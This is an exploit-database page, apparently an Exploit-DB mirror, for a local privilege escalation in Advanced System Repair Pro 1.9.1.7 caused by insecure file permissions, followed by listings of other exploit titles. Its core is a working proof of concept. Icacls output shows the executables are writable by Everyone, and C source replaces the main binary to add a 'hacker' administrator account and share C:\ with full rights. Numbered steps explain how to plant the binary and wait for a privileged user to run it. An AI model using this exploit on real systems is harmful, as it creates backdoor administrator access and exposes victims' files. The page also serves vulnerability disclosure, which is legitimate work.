Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions"

Author

Exploit author

ZwX

Platform

Exploit platform

windows

Release date

Exploit published date

2020-01-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2020-01-12
# Vendor Homepage : https://advancedsystemrepair.com/
# Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe
# Tested on OS: Windows 10


# Proof of Concept (PoC):
==========================

C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe
AdvancedSystemRepairPro.exe Everyone:(F)
                            AUTORITE NT\Système:(I)(F)
                            BUILTIN\Administrateurs:(I)(F)
                            BUILTIN\Utilisateurs:(I)(RX)
							
dsutil.exe Everyone:(F)
           AUTORITE NT\Système:(I)(F)
           BUILTIN\Administrateurs:(I)(F)
           BUILTIN\Utilisateurs:(I)(RX)
		   
tscmon.exe Everyone:(F)
           AUTORITE NT\Système:(I)(F)
           BUILTIN\Administrateurs:(I)(F)
           BUILTIN\Utilisateurs:(I)(RX)
							
		 
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0);
return 0;
} 

2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe"
3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory
4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE. 
Privilege Successful Escalation
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "Ünsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-09-29 "BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)" local windows "Christian Vierschilling"
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
2020-09-14 "Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path" local windows Jok3r
Release Date Title Type Platform Author
2020-02-12 "MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow" local windows ZwX
2020-02-11 "Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow" local windows ZwX
2020-02-10 "Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow" local windows ZwX
2020-02-06 "ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path" local windows ZwX
2020-01-13 "Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions" local windows ZwX
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2020-01-09 "ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)" dos windows ZwX
2020-01-06 "Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path" local windows ZwX
2019-12-18 "XnView 2.49.1 - 'Research' Denial of Service (PoC)" dos windows ZwX
2019-12-18 "AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow" local windows ZwX
2019-12-05 "NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path" local windows ZwX
2019-12-05 "Amiti Antivirus 25.0.640 - Unquoted Service Path" local windows ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Key' Denial of Service" dos windows ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Name' Denial of Service" dos windows ZwX
2019-11-27 "Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)" dos windows ZwX
2019-11-27 "SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)" dos windows ZwX
2019-11-22 "ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path" local windows ZwX
2019-11-22 "LiteManager 4.5.0 - Insecure File Permissions" local windows ZwX
2019-11-19 "XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service" dos windows ZwX
2019-11-19 "BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path" local windows ZwX
2019-11-18 "MobileGo 8.5.0 - Insecure File Permissions" local windows ZwX
2018-09-13 "Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)" dos windows_x86 ZwX
2018-09-13 "Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow" local windows ZwX
2018-08-29 "R 3.4.4 - Buffer Overflow (SEH)" local windows ZwX
2016-12-16 "WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection" webapps php ZwX
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47905/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.